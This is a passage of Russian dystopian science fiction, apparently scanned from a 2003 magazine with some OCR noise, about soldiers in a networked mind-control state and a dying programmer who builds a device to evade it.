казалось глупым, он совсем не хотел нико- 
го напугать. Еще секунда - и Шнайдер не 
удержался бы на ногах; Горовиц подставил 
ему плечо. 

- Ну? - настойчиво спросил он, удерживая 
вздрагивающего Шнайдера от падения. - Ты 
хоть знаешь, ЧТО это такое? Как ОНО выгля- 
дит? 

Локридж неподвижно буравил его глазами. 
Где-то метрах в двухстах взбрыкнул чей-то 
автомат - коротко, зло; Локридж даже не по- 
шевелился, лишь краешком сознания отме- 
тив про себя четкость и уверенность чьей-то 
стрельбы. «Как оно выглядит?» 

- ТЫ... - начал Локридж. - Ты хоть понима- 
ешь... 

- Понимаю, - коротко ответил Горовиц. - Но 
кто-то же должен был спросить. 

- КАКОГО ДЬЯВОЛА ТРОЕ СТОЯТ НА ОДНОЙ 
OTMETKE!? - раздался крик в наушниках у 
всех собравшихся на пятачке солдат. - БЕ- 
ГОМ, БЕЗДЕЛЬНИКИ! 

Шнайдер покачнулся. Крик лейтенанта Рэя, 
отследившего в данный момент времени 
три отметки на карте, достал его go самого 
сердца. Горовиц протянул ему руку - и в эту 
секунду грянул винтовочный выстрел. Пуля 
просвистела совсем рядом с Локриджем, он 
бросил свое усталое тело в щель между бе- 
тонными плитами, вставшими от недавнего 
взрыва карточным домиком. Локридж уже 
очень сильно пожалел о том, что автомат 
находится сейчас за спиной - хотя не иск- 
лючено, что будь он в руке, он помешал бы 
нырнуть в спасительную щель. 

В глаза, нос и рот набилась бетонная крош- 
ка. С трудом дотянувшись сначала одной 
щекой GO воротника, потом другой, Лок- 
ридж сумел кое-как вытереть лицо. Но тут 
же грянула беспорядочная стрельба, он ма- 
шинально ткнулся лицом в землю, вновь 
набрав полные ноздри бетонной пыли. В 
метре от него, за плитой, застучал автомат - 
Шнайдер или Горовиц? Но стрельба очень 
быстро прервалась - коротким жалобным 
стоном. Все стихло. 

Спустя пару секунд Локридж понял, что на- 
go выбираться - или он получит пулю в спи- 
HY от этих гадов, когда они подберутся поб- 
лиже. Уверенность в том, что его друзья 
мертвы, овладела им целиком. Он на мгно- 
венье замер, вслушиваясь в окружающие 
его звуки, - и с ужасом понял, что кто-то 
шел к нему, достаточно быстро, практически 
бегом. Алекс попытался вспомнить, с какого 
направления он услышал выстрелы, но по- 
том плюнул на это, засучил ногами и поста- 
рался выбраться из укрытия ногами вперед. 
Получилось не сразу - тем более, что пери- 
одически приходилось замирать и вслуши- 
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ваться в приближающиеся шаги. Скоро в 
глаза брызнул дневной свет; правая рука 
рванула автомат на себя, Локридж откатил- 
ся в сторону и, направив ствол туда, откуда 
слышались шаги, прильнул к прикладу. 

Под локоть попалось что-то мягкое и теп- 
лое. Локридж скосил глаза вбок. Оказалось, 
его рука упиралась в простреленную грудь 
Горовца, который лежал, уставившись отк- 
рытыми немигающими глазами в мрачное 
дождливое небо. Локридж медленно сдви- 
нул локоть в сторону, неподвижно устано- 
вил его между камней и вновь взглянул в 
прорезь прицела. Никого не было видно; 
сектор предполагаемого обстрела был чист. 
Шаги тоже уже не были слышны в течение 
минуты. 

Кто бы это ни был - он либо умело спрятал- 
ся, либо убежал. 

«Как ОНО выглядит?» - прозвучало в ушах 
Локриджа эхо вопроса, заданного мертвым 
уже Горовцом несколько минут назад. Не 
отрываясь от прицела, Локридж протянул 
руку к трупу, нащупал на поясе магазины, 
снял, засунул себе за голенище. 

Невдалеке раздался шорох - словно кто-то 
полз, размеренно и быстро. Локридж быст- 
ро прицелился и дал в том направлении 
очередь - короткую, точную, на поражение. 
Несколько кусков бетона, повисших на гну- 
тых арматуринах, словно ветром сдуло - они 
разлетелись в пыль примерно там, откуда 
раздавался звук. Шорох прекратился. 
Локридж аккуратно переполз через Горов- 
ца, не обращая внимания на лужу крови, 
постепенно разбавляющуюся дождевой во- 
дой, краем глаза отметил торчащие из-под 
него неподвижные ноги Шнайдера и при- 
нялся локтями толкать землю от себя. Авто- 
мат, взятый за ремень, периодически заст- 
ревал в развалинах; Локридж чертыхался 
про себя, освобождал его и полз дальше. 

- КАКОГО ЧЕРТА МОЛЧИМ, ЛОКРИДЖИ! - заг- 
рохотал в наушниках Pan. - Где отметки 
Шнайдера и Горовца?! У тебя потери? 

- У вас... - шепнул Локридж и решил прице- 
пить к автомату штык-нож. Щелчок прозву- 
чал неожиданно громко, заставив Локрид- 
жа вжаться поглубже в бетонное крошево. - 
Шнайдер и Горовиц убиты. Я на отметке... 
хрен знает, где я, тут развалины магазина, 
судя по всему, канцелярского (Локридж 
развел штык-ножом перед собой пару ящи- 
ков со школьными тетрадями и увидел под 
ними лицо продавца с пулевым отверстием 
вместо правого глаза). 

- ЧТО ВЫ НАМЕРЕНЫ ПРЕДПРИНЯТЬ? 

- Лейтенант, что вы все время орете? - про- 
должал шептать Локридж. - Вас прекрасно 
слышно. Здесь кто-то прячется, я намерен 
осмотреть развалины более тщательно. По- 
мощь не требуется, если будет нужно, я 
поставлю вас в известность... 

Поправив каску, Локридж подтянул автомат, 
положил палец на спусковой крючок и при- 
поднялся на колено. Впереди не было вид- 
но ничего похожего на человека. 
Прислушавшись повнимательнее, Локридж 
различил на фоне шуршащего по камням 
дождя прерывистое дыхание - кто-то метрах 
в двадцати отсюда переживал явно не луч- 
шие времена. Внезапно раздался кашель, и 
Локридж увидел, как в неглубокой воронке 
точно там, откуда доносилось прежде дыха- 


ние загнанного зверя, на секунду припод- 


нялся человек с залитым кровью лицом. 
Едва рядовой навел оружие в том направ- 
лении, как силы оставили человека, он упал 
на спину обратно, так и не заметив прибли- 
жающегося спецназовца. У Локриджа была 
неплохая возможность захватить эту сво- 
лочь в плен... 

До этого момента они убивали всех, не 
стремясь взять хоть кого-нибудь, это не 
предусматривалось задачей, которую поста- 
вил им Рей. В трех кварталах Лос-Аламоса в 
общей сложности было убито около сорока 
человек (правда, оружие в руках было, дай 
бог, только у четверти из них, HO...). Спецназ 
прошел по этой части зараженного города 
медленно и неотвратимо, подминая под се- 
бя все, что только можно - и это несмотря 
на то, что все они по обе стороны баррикад 
были единоверцами и соплеменниками. 
Слишком уж велика была цена - оставлять 
в живых таких подонков у себя за спиной. 

И вот теперь, когда в голове у Локриджа 
пульсировал вопрос, за который Горовиц 
заплатил своей жизнью, где-то внутри «ав- 
томат» Локриджа встал на предохранитель. 
Он был готов поговорить с одним из них. 


жжх 


Судя по всем признакам, у Криса была вы- 
сокая температура. Кожа стала горячей, по 
шее катился пот. Периодически он сильно 
зажмуривался, старясь восстановить фокус 
в глазах - экран постоянно расплывался в 
некое мутное пятно, различить на котором 
что-нибудь было практически невозможно. 
Живот уже не болел - он просто казался чу- 
жим, вылепленным из картона. Его дыха- 
ние, шумное и поверхностное, вызывало у 
жены слезы. Она уже давно простилась с 
ним, давно приготовила все для похорон; но 
сердце отказывалось верить в происходя- 
щее. 

Спасая мужа от кошмаров действительнос- 
ти, она брала по вечерам его провод, а не 
свой, подключалась - и приходила в себя 
спустя примерно час после Воздействия. 
Одна и та же картина представала ее глазам 
- посеревший от смертельной болезни Крис, 
уткнувшийся взглядом в экран ноутбука. 
Она четко знала, что в течение двух суток 
сервер будет обрабатывать информацию о 
незадействованном проводе, после чего к 
ним в дом явится спецназ с целью выяс- 
нить, по какой причине личность номер та- 
кой-то уклоняется от Воздействия. Ждать 
оставалось не так уж и долго. 

Когда жена прикоснулась к его плечу, Крис 
доверчиво прижался к руке щекой, не отры- 
ваясь от экрана. 

- Ты должен сделать это со мной, - тихо 
прошептала Мария. - Скоро они будут 
здесь... 

Пальцы мужа замерли над клавишами. Он 
медленно разогнулся, но тут же едва не 
сложился пополам от боли, внезапно прон- 
зившей все тело. 

- Еще... не готово, - сквозь зубы прошептал 
он. - Если я не... буду спать, то часов через 
десять, может... чуть больше... Солормин... 
Мне нужен солормин. 

Жена молча сунула руку в карман, протяну- 
ла ему таблетку. Крис поднял на нее взгляд 
- Мария отвернулась. Он знал, что у них не 


было денег - по крайней мере, на наркотики 
точно. И тутон впервые за последние три 
дня посмотрел на нее внимательно - и уви- 
дел накрашенные губы, подведенные бро- 
ви, чулки со швом, высокий каблук... 

Его лицо скривилось от боли - то ли от Cpu 
зической, то ли от душевной. Жена закрыла 
лицо руками. 

- ТЫ... - начал Крис. Жена протянула теплую 
ладонь, закрыла ему рот. Крис замер на се- 
кунду, потом мягко освободился и произ- 
нес: 

- Ты умеешь стрелять? 

Мария кивнула. 

- Ав человека? 

Она кивнула - более жестко. И он понял, по- 
чему. Конечно же, у кого еще в этой стране 
есть деньги... 

- Я бы не хотел прерываться, но раз подош- 
ло время... 

Он взял конец провода с разъемом, совпа- 
дающим с тем, что носила его жена, вотк- 
нул один его конец в ноутбук, другой - ей в 
правое запястье; попросил присесть. 

- Я хочу предупредить тебя, милая... То, что 
ты обретешь, испугает тебя. Поверь мне, я 
знаю, что говорю, - я испытал на себе две 
первые версии. Хочется верить, что это путь 
к свободе. Автомат - под полом в кладовой, 
две половицы в дальнем правом углу сни- 
маются довольно легко... 

Она кивнула, соглашаясь. Он положил 
пальцы на клавиатуру, на мгновенье ощу- 
тил в себе биение смерти и быстро набрал 
нужную комбинацию. На экране поползла 
полоса загрузки. 

ария сидела, не шевелясь. Крису каза- 
лось, что он видит, как с его компьютера в 
нее переливается информация. Медленно 
розовели ее щеки; дыхание не изменилось 
ни на йоту. Крис ожидал всего, чего угодно - 
но только не полного отсутствия реакции. 
Ноутбук коротко пикнул. Полоска загрузки 
добежала go конца и исчезла. Тело жены 
на мгновенье обмякло - но тут же вновь 
напряглось, она открыла глаза. 

- В кладовой? Под полом? - коротко спро- 
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сила она. 
- Да, - машинально ответил Крис. - Как ты 
себя чувствуешь? 

Она не ответила, встала и хлопнула дверью. 
Через минуту он услышал треск выдирае- 
мых половиц. Коротко вздохнув, он убрал 
провода и принялся за работу. Когда жена 
вернулась, он не повернул головы - не хо- 
тел видеть ее, всю такую красивую и желан- 
ную с автоматом в руках. Он уже простился 
с этим миром. 

Солормин прояснил его мозги; строки кода 
выстраивались так, как им было положено. 
А за спиной стояла его жена - такая родная 
и такая чужая, направив ствол автомата на 
входную дверь. И Крис знал - никто не вой- 
дет сюда, пока он не закончит работу... 


* * * 


Локридж nogOupanica к своей жертве по 
всем правилам искусства спецназа. Тихо, 
медленно и неотвратимо. Ни звука не могло 
долететь gO человека, скрывающегося в во- 
ронке. OH уж предвкушал получение mega- 
ли за захват преступника, застрелившего 
двух спецназовцев, как вдруг в наушнике 
коротко запищало. 

- Черт побери! - сквозь зубы прошипел Лок- 
ридж. Он совсем забыл о том, что его рейд 
неоправданно затянулся, что сейчас восемь 
часов вечера - время Воздействия. Ему сроч- 
но надо было найти какой-нибудь броневик 
или танк со стационарным приемо-передат- 
чиком. Но ведь его цель могла исчезнуть за 
то время, которое необходимо Локриджу на 
совершение ежедневной процедуры! 

- РЯДОВОЙ ЛОКРИДЖ! - загрохотал в науш- 
нике Рэй. - СРОЧНО ПРИБУДЬТЕ НА БАЗУ 
ДЛЯ... 

Локридж в сердцах выдернул наушник, ос- 
тавив его болтаться на проводе за плечом. 
Все готово было рухнуть в одно мгновенье. 
Оставалось только подбежать к раненому в 
воронке и застрелить его, как их учил кап- 
pan, из милосердия. Локридж коротко 
вздохнул, поднялся во весь рост и преодо- 
лел последние десять шагов за секунду. 


Ствол автомата, наведенный в воронку, ос- 
ветил подствольным фонарем в грязной лу- 
же на дне человека, лежащего ничком. Пе- 
риодически он пытался поудобнее лечь, но 
у него плохо получалось. Локридж понял, 
что вода в луже насыщенного розового 
цвета - человек был ранен. 

Аеще через мгновенье Локридж понял, что 
это женщина. И палец сам собой убрался со 
спускового крючка. 

Давно на этой чертовой службе он не видел 
ЖЕНЩИН - только мишени. Женщины стали 
для него не более чем целями для стрель- 
бы. И только сейчас, глядя на раненую, он 
вдруг ощутил давно забытые чувства и же- 
лания. Положив автомат на бруствер ворон- 
ки, он аккуратно спустился вниз и подхва- 
тил ее легкое тело на руки. Намокшее 
платье обхватило ее не менее цепко, чем 
руки Локриджа. Каждая линия ее тела, об- 
рисованная дождем, вызывала в рядовом 
жалость и сочувствие. Пытаясь поднять ее, 
он понял, что она крепко сжимает в своих 
руках тоненький ноутбук. Вынеся ее наверх, 
он осторожно вытащил из ее мертво сжатых 
пальцев компьютер, положил женщину на 
ровную, не разбитую взрывом плиту и ос- 
мотрел тело в поисках ран. 

Довольно быстро нашлась маленькая кро- 
воточащая дырочка под правой ключицей и 
пара сквозных пулевых отверстий на левом 
бедре. Достав индивидуальный перевязоч- 
ный пакет, Локридж по всем правилам из- 
бавил ее правое легкое от сообщения с ок- 
ружающим воздухом, после чего наложил 
повязку на бедро. 

Женщина, gO этого никак не реагировавшая 
на манипуляции, которые проводил с ней 
спецназовец, внезапно глубоко вздохнула, 
широко раскрыла глаза и крикнула: 

- Кри-и-и-стиан!.. 

Локридж от неожиданности запутался в 
бинте и схватился за автомат. Женщина об- 
мякла и потеряла сознание. Солдат смотал 
остатки бинта, засунул их в нагрудный кар- 
ман и внимательно всмотрелся в черты ли- 
ца раненой незнакомки. Кем она была? Кто 


КОМПЕТЕНТНЫЙ: 


1 м1 


ЕСЛИ ТЫ ЗДЕСЬ НЕ БЫЛ - ТЫ ОТС 


| id! 
aa; 


07(32) 2003 ane 


page ELEM 


уречу 1950 


ОТ ЖИЗНИ 


СТОРИ/СВОБОДА 1.0 (FINAL RELEASE) 


OSp! 4hack 


этот Кристиан, которого она зовет в бреду с 
пулей в груди? 

Неожиданно она стала шарить руками возле 
себя, пытаясь что-то найти; Локридж зачем- 
то протянул ей свою руку. Она вцепилась в 
нее; Локридж оценил по достоинству ее 
длинные ногти с великолепным маникюром. 
- Кристиан! - шептала она, с трудом шевеля 
губами. - Я сделала... все, что ты просил... 
Фильтр... Где фильтр? ГДЕ ФИЛЬТР? - закри- 
чала она нечеловеческим голосом и попы- 
талась подняться. Локридж довольно умело 
уложил ее обратно, погладил по руке - это 
ее несколько успокоило, она явно не пони- 
мала, где находится и кто держит ее за руку. 
Заглянув в воронку и посветив в лужу фо- 
нарем, он заметил на дне ее маленький 
пластмассовый бокс. Оставив раненую, он 
вновь спустился вниз, выудил из грязи ко- 
робку и поднялся наверх, чтобы получше 
разглядеть, что же послала ему судьба. 

Это оказался достаточно непонятный де- 
вайс - что-то типа 1Р-драйва со вставлен- 
ной в него дискетой. Повертев его в руках, 
Локридж так и не сумел сказать по поводу 
этого устройства что-то определенное. По- 
гасшие светоиндикаторы, кнопка выброса, 
пара гнезд на задней панели... Пара гнезд... 
Локридж закатал правый рукав и внима- 
тельно рассмотрел личное гнездо Воздей- 
СТВИЯ. 

- Один в один... - прошептал он сам себе. 
Девайс начал обретать в его глазах некий 
таинственный смысл, пугающий и невероят- 
ный. Он вновь вспомнил о том, что время 
Воздействия истекает, что где-то на команд- 
ном пункте лейтенант Рэй сходит с ума и го- 
товит группу поиска. И в этот момент он 
вновь вспомнил вопрос Горовица и прого- 
ворил его себе nog нос: 

- Как ОНО выглядит? 

В наушнике, болтающемся за спиной, раз- 
далось попискивание - судя по всему, Рэй 
его слушал все это время, пытаясь опреде- 
лить, что происходит. Локридж оторвал ку- 
сок ткани от юбки раненой и, сделав из них 
прокладки, подсунул их под ларингофоны. 
- Что ЭТО такое? - договорил он слова Горо- 
вица, ставшего в настоящий момент кучей 
временно упорядоченной органики. - Неу- 
жели мы искали ЭТО? 

Он присел на землю рядом с женщиной и 
взял ее за руку. Она моментально сжала 
пальцы, вцепившись в него мертвой хват- 
кой. Солдат наклонился к ее уху и спросил: 
- Что это за устройство? Эй, женщина... 

И даже не понял, когда она успела выта- 
UMTb из-за пояса пистолет - только мокрое 
холодное прикосновение металла к коже 
виска заставило его замереть и прислу- 
шаться к прерывистому дыханию раненой: 
- Заткнись, убийца... 
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Мария, устав стоять, принесла из кухни та- 
буретку, опустилась на нее и положила ав- 
томат на колени. Крис отметил это краеш- 
ком зрения, не отрывая глаз от экрана. Во 
рту пересохло; он протянул руку к бутылке 
с кипяченой водой, которую жена заблагов- 
ременно поставила в пределах досягаемос- 
ти, сделал несколько жадных глотков, зная 
0 том, что скоро его вырвет, организм уже 
отказывался принимать в себя хоть что-ни- 
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будь. Но на короткое время жажда была об- 
манута. 

Дело подходило к концу. Пару раз выпол- 
нив промежуточную компиляцию, Крис с 
радостью отметил отсутствие ошибок. Де- 
вайс для программы уже давно ждал про- 
шивки рядом с ноутбуком. 

C каждой нажатой клавишей Крис становил- 
ся все ближе к смерти, однако успешная ра- 
бота окрыляла его, придавала сил. Спал он 
за последние сутки очень мало, хотя смер- 
тельно больной организм требовал отдыха, 
забытья. Жена еще пару раз давала ему со- 
лормин, извлекая его из маленькой шкату- 
лочки, висевшей на груди. Наркотик возвра- 
щал его к реальности, одаривая еще нес- 
колькими часами работоспособности. 
Несколько раз жена подбегала к двери и 
прислушивалась к тому, что происходит на 
улице; раз она даже взвела затвор и щелк- 
нула предохранителем, однако тревога ока- 
залась ложной. Правда, обратно на предох- 
ранитель она уже автомат не ставила. 

Крис взял со стола девайс, подключил его к 
ноутбуку и запустил процесс инсталляции. 
Программа, написанная им и наконец-то за- 
конченная, обретала новый смысл на его 
Фильтре Воздействия. На установку необхо- 
димо было время - Крис откинулся в кресле 
и взглянул на свой ставший доскообразным 
живот. Повязка слабо промокла кровью и 
еще чем-то зеленоватого цвета. Только сей- 
час, закончив работу, он обратил внимание 
на себя - и ужаснулся тому состоянию, в ко- 
тором находился. 

Тоненький писк подтвердил окончание инс- 
талляции. И тут же за дверью загрохотали 
сапоги, и чей-то грубый голос в мегафон 
прокричал: 

- Федеральная служба! Нам нужна миссис 
Осборн! Убедительная просьба открыть 
дверь, в противном случае мы будем вы- 
нуждены войти силой! 

Мария вскочила с табуретки и, подняв авто- 
мат к плечу, навела его на дверь. 

- Успокойся, милая, - ласково сказал Крис. - 
Они того не стоят. Возьми свой личный про- 
вод и попробуй использовать Фильтр... 

- Но тогда пойдет двухдневный отсчет твое- 
го срока, - глухо сказала она, прижимаясь 
щекой к прикладу. 

- Я не протяну столько, дорогая... Я гаранти- 
рую и работу Фильтра, и свою собственную 
смерть. Сохрани прибор. Найди хорошего 
инженера-программиста. Сделайте копию. 
Наладьте подпольное производство. Вы бу- 
дете свободны... 

Раздался странный звук, напоминающий 
скрежет металла о металл. Крис недоумен- 
но оглянулся, а потом понял - это рыдала 
его жена. Она вздрагивала плечами, ствол 
гулял из стороны в сторону, оставаясь, тем 
не менее, направленным на дверь. 

- Быстрей! - крикнул Крис. 

Мария прислонила автомат к табуретке и 
быстро подошла к мужу. Пара проводов, по- 
явившаяся будто бы из ниоткуда, соединила 
ее с сетью Воздействия через Фильтр. Крис 
прикрыл глаза, чтобы не видеть, если что-то 
пойдет не так. Но все было именно так, как 
они планировал. 

Жена тоже испуганно зажмурилась; но ког- 
да стало ясно, что трафик Воздействия вхо- 
дит в Фильтр, учитываясь на дисплее (и, со- 


ответственно, на производящем сервере), а 
на жену никакого влияния не оказывает, 
Крис едва удержался от восторженного 
крика. Он победил эту чертову проблему! 
Из-за двери снова раздался хриплый мега- 
фонный голос: 

- Несмотря на то, что миссис Осборн только 
что воспользовалась личным разъемом 
для получения Воздействия, мы требуем со- 
действия для входа в ваш дом! Имеем на то 
личное разрешение начальника Федераль- 
ной службы и Управления информации! 
Жена, раскрыв глаза и не замечая крика за 
дверью, смотрела на мужа. 

- Он имитирует твою личность, - хитро при- 
щурившись, сказал Крис. - Серверная часть, 
передающая Воздействие, полностью уве- 
рена в том, что его получает миссис Осборн 
- в полном объеме. 

- То есть эта штука - только для меня? 

- Пока - да. Но я оставляю на ноутбуке ис- 
ходные коды программы. В умелых руках 
вполне возможно превратить все это в не- 
кое универсальное средство фильтрации 
Воздействия. 

Мария опустила автомат, подошла ближе. 

- Мы можем стать - независимыми от Сети? 
Все? 

Крис кивнул: 

- Ты же знала, над чем я работаю... 

Жена отрицательно покачала головой. 

- Нет. Я думала - все гораздо проще. Я ду- 
мала - ты научишь нас убивать. Ведь уже 
скоро сорок лет... Эти проклятые переселе- 
ния, эксперименты... Все, что мне хотелось, - 
это взять в руки оружие и суметь нажать на 
курок. 

Крис вздохнул - ровно настолько глубоко, 
сколько ему давала рана в животе. 

- Проклятая ненависть... (Мария подняла из- 
мученный взгляд на него, попыталась что- 
то ответить.) Нет, не говори ничего. Я все по- 
нимаю. Это сидит в нас уже полвека, приви- 
то нам нашими отцами и матерями. Ты gy- 
мала - запусти я свою программу, и ты смо- 
жешь направить ствол на спецназовца? Это 
было бы крайне просто сделать - учитывая 
мои теперешние познания... Я сумел осво- 
бодить ваши мозги... 

В дверь громко бабахнул чей-то кулак. Крис 
вздрогнул. 

- Надо спасти ноутбук и коробку с Фильт- 
ром! 

Жена выхватила из-под стола спортивную 
сумку, попыталась запихать туда компью- 
тер, но грохнувший за дверью выстрел зас- 
тавил ее выронить все, она схватила авто- 
мат и короткой очередью огрызнулась 
сквозь дверь, от которой полетели щепки. В 
образовавшиеся дырки хлынул свет про- 
жектора, освещающего подходы к дому, то- 
ненькие яркие лучики пронзили прихожую 
насквозь. 

Стрельба заставила бойцов на некоторое 
время отойти для получения новых ввод- 
ных. Крис, превозмогая боль, дотянулся go 
сумки. 

- Ты должна бежать... - прохрипел он. Жена 
протянула руки к компьютеру... 

За дверью грохнул мощный выстрел, сов- 
павший во времени со взрывом в дверном 
проеме. Дверь в долю секунды преврати- 
лась в облако щепок и пыли, луч прожекто- 
ра ворвался внутрь дома, на какое-то время 


ослепив Криса; он неловко столкнул Фильтр 
со стола. 

Жена подхватила его. Раздался топот множе- 
ства бегущих ног. Взгляд жены метнулся к 
двери, выводящей на задний двор. Крис кив- 
нул и взял в руки автомат. Мария жадно при- 
пала к его губам на прощание, оттолкнула се- 
бя сама и бросилась к выходу. За спиной заг- 
рохотал автомат мужа... 

Она бежала и бежала, так и сжимая в руках 
компьютер и коробку Фильтра, пока не спотк- 
нулась в какой-то луже и не упала на труп 
спецназовца, рядом с которым лежала снай- 
перская винтовка. 

Рыдания рвались из ее груди наружу. Она гла- 
дила компьютер, помнивший тепло рук ее 
убитого Кристиана, плакала навзрыд, разма- 
зывая грязь по щекам... Она не знала, что ей 
теперь делать. И только услышав разговоры 
солдат неподалеку, она заметила рядом с со- 
бой винтовку. Желание оформилось сразу же. 
Она никогда не стреляла из подобного оружия. 
Едва она припала глазом к прицелу, как выяс- 
нилось, что отследить цель через него неуме- 
лому человеку крайне сложно. Даже слабое 
покачивание неопытной кисти вызывало пере- 
мещение участка, находящего в прицеле, не 
на один десяток метров. Пришлось выползти 
из лужи, подставить под ствол некое подобие 
штатива из пары сломанных веток. 

Солдаты, отчаянно споря между собой, не за- 
мечали всех приготовлений к стрельбе, хотя 
90 Марии от них было не более пятидесяти 
метров. Один из них закинул автомат за пле- 
чо. Двое других что-то пытались ему объяс- 
нить - или спросить что-то важное. 

Выбор стать первой мишенью пал на солдата, 
постоянно переминающегося с ноги на ногу - 
несмотря на то, что он достаточно много ше- 
велился, он не сходил с места, что давало 
женщине изрядное преимущество. Она опус- 
тил ствол на подставку, прицелилась. Палец 
пополз к спусковому крючку. 

Она затаила дыхание. Сможет ли она это сде- 
лать? И тут перед ее глазами возник Крис, 
живой и невредимый - он ободряюще улыб- 
нулся и кивнул. И она выстрелила. 

Тот солдат, что стоял сейчас без автомата, 
нырнул в какую-то расщелину. Второй замер 
на месте. А третий - кому была предназначена 
пуля - упал. Легонько поведя стволом, Мария 
выстрелила в того, что остался стоять. Не по- 
пала. Он ринулся вниз, к TOMY, что уже был 
убит (Мария чувствовала это - она не могла 
промахнуться). 

Через секунду по ней открыли огонь из авто- 
мата. Она не боялась. В прицеле возник язы- 
чок пламени, бьющий из ствола. Взяв чуть 
выше, она выстрелила в ответ. Автомат тут же 
захлебнулся. 

Она закинула винтовку за спину, схватила 
компьютер и Фильтр и ужом принялась выка- 
рабкиваться наверх, чтобы укрыться в лесу, 
прилегающему к резервации. Она хотела как 
можно быстрее уползти отсюда, чтобы не 
стать жертвой своей собственной минутной 
слабости, - но как ей хотелось выстрелить в 
них! Отползая в сторону, она внимательно 
смотрела по сторонам, но все-таки упустила 
тот момент, когда оставшийся в живых солдат 
выбрался из своего укрытия. Сбоку от нее 
грохнула короткая очередь. И она тут же по- 
няла, что ей трудно дышать. 
Ниже правой ключицы, практически там, где 


она прижимала приклад, из маленькой ды- 
рочки вытекала легкими толчками густая тем- 
ная кровь. Потом нестерпимо зажгло левое 
бедро. 

Зашумело в голове. Она оттолкнула винтовку 
от себя и съехала по скользкому склону оче- 
редной воронки вниз, сил остановиться не 
было. Она помнила, что этот солдат обяза- 
тельно придет, что ей надо спасти компью- 
тер... 

Небо кружилось у нее над головой. Дышать 
становилось все труднее. Она нащупала ру- 
кой Фильтр и подтянула к себе. Как все глупо 
получилось... 

- Крис, - прошептала она. - Крис... 

А потом кто-то взял ее на руки... 


жжх 


Пистолет придал Марии уверенности. Его она 
нашла там же, где и автомат, - в тайнике Кри- 
са. Сунув за пояс, она очень быстро забыла 0 
нем - теперь он оказался как никогда кстати. 
Несмотря на то, что правая рука двигалась 
еле-еле, она нашла в себе силы ткнуть ство- 
лом солдату в шею и уравнять шансы. 

Потом она почувствовала повязку на груди и 
бедре и пристально взглянула в глаза Лок- 
риджу. 

- Зачем? 

- Я хочу знать, что это, - ответил Алекс, ско- 
сив глаза в сторону прибора (шевелить голо- 
вой он не решался). 

Мария застонала, пистолет качнуло в руке. 
Локридж на мгновенье представил, как она 
нажимает на курок, и его голову отрывает от 
плеч. 

- Вы можете положить оружие? Я не сделаю 
вам ничего плохого... - шепнул он. Женщина 
рванулась к нему и больно надавила концом 
ствола на ключицу. 

- Нет, это я сделаю... Сволочи... 

Локридж кивнул. Грустно быть в заложниках 
У человека, которому ты несколько минут на- 
зад оказывал помощь. 

- Хорошо, - сказал он. - Что вы хотите? Ведь 
мы не можем сидеть так бесконечно - у вас, 
вероятно, внутреннее кровотечение, да и пра- 
вое легкое постепенно откажется дышать в 
полную силу. Вам надо к врачу. 

- К какому? - внезапно севшим голосом спро- 
сила она. - К такому же? - она кивнула в сто- 
рону разъема на своем предплечье. - Или у 
вас врачи не подключены к Сети? 

Вначале Локридж не понял, что она имела в 
виду. Но когда вспомнил чистые руки доктора 
Вашингтона - руки, на которых не было разъе- 
ма, - то взглянул на женщину уже другими 
глазами. 

- Что вы хотите этим сказать? - спросил он, 
перестав обращать внимание на пистолет, 
пляшущий в нетвердой руке возле его шеи. - 
Причем здесь Сеть? 

- Мария... Меня зовут Мария... - она выронила 
пистолет и упала в его поставленные руки. - 
Чтобы ты запомнил... на всю жизнь. Мария Oc- 
борн. А мой муж... 

- Кристиан, - коротко ответил Алекс. - Я знаю; 
ты произнесла это имя в бреду. 

Мария закрыла глаза при упоминании имени 
своего мужа. Ее руки уже не искали оружия; 
по щекам, смешиваясь с дождевыми капля- 
ми, потекли слезы. 

- Я хочу знать, что это такое, - настойчиво 
повторил Локридж, несмотря на то, что с 
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детства не любил женские слезы. OH взял с 
земли устройство, протянул его Марии. Та 
аккуратно приняла его и прижала к груди. 

- Я должна была спасти его - от таких, как 
ты, - виновато сказала Мария, будто бы из- 
виняясь перед мужем. - Не получилось... 
Внезапно она схватила пистолет и, напра- 
вив его в грудь Локриджу, закричала: 

- Ты не получишь его! 

Выстрел свалил Локриджа с ног. Он не испу- 
гался ни на грамм - на тренировках их учи- 
ли выдерживать выстрел в бронежилет. Он 
был абсолютно уверен, что пистолетная пу- 
ля не пробьет его; на это был способен 
только бронебойный патрон из снайперской 
винтовки - такой, что убил Шнайдера. Слов- 
но молотком шарахнули по груди - Локридж 
отлетел на пару метров и скатился в какую- 
то яму. Там, где лежала Мария, раздались 
шорох и стоны - она пыталась уползти. 

В течении пары минут Алекс приводил в по- 
рядок дыхание, сбитое выстрелом в упор. 
Потом поднялся на ноги и выбрался туда, 
где лежала Мария. Она не смогла уйти да- 
леко - поднявшись на ноги и сильно хро- 
мая, ей удалось преодолеть не более gBag- 
цати шагов. Она упала на колени и, прижи- 
мая к груди ноутбук, плакала от злобы и 
бессилия. Когда Локридж подошел к ней, 
она вскрикнула от неожиданности и выро- 
нила бы компьютер, если бы Алекс не подх- 
ватил его. 

- Я не причиню вам зла, - как можно мягче 
сказал он (насколько вообще мягко и спо- 
койно может говорить человек, которому 
только что выстрелили в грудь). - Просто я 
созрел для вопросов. 

- Просто ты опоздал к Воздействию, - хмуро 
ответила Мария. - Еще не поздно, поторо- 
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ПИСЬ... 
- Какая связь?..- недоуменно подняв бро- 
ви, спросил Локридх. - При подключении 
мы получаем вводные для... 

- У тебя есть солормин? - неожиданно пе- 
ребила его Мария. 

- Да, - ответил Локридж, после чего достал 
из походной аптечки шприц с наркотиком и 
протянул его женщине. 

- Инъекция? А я всю жизнь думала, что он 
в таблетках. 

- Втаблетках - облегченный вариант, Nog 
держивающая доза. Раненый солдат должен 
вначале сделать себе укол, а уже потом... 

- То есть таблетки - хуже? 

- Смотря для чего... 

Мария вздохнула и воткнула шприц-тюбик 
себе в правую ногу, нажала. 

- Будете вытаскивать - не отпускайте, а то 
половину всосете обратно, - предупредил 
Локридж, на секунду задумавшись, как он 
объяснит отсутствие наркотика в аптечке 
капралу. 

Женщина швырнула использованный 
шприц на камни и вытянулась на земле, 
прижав повязку на груди левой рукой. 

- На сколько ты опоздал? 

- Начас десять. 

- Через два, максимум два с половиной ча- 
са с тобой будет уже очень интересно раз- 
говаривать - при условии, что тебя не най- 
дут раньше. А ведь это очень большая 
проблема - солдат, вовремя не подключив- 
шийся к Сети... 

Локридж не понимал ни слова - будто они 
говорили на разных языках. Конечно, в их 
службе случалось всякое; порой солдаты 
опаздывали к Воздействию в связи с нес- 
тандартными боевыми задачами. Но с ними 
ничего не происходило - группа поддержки 
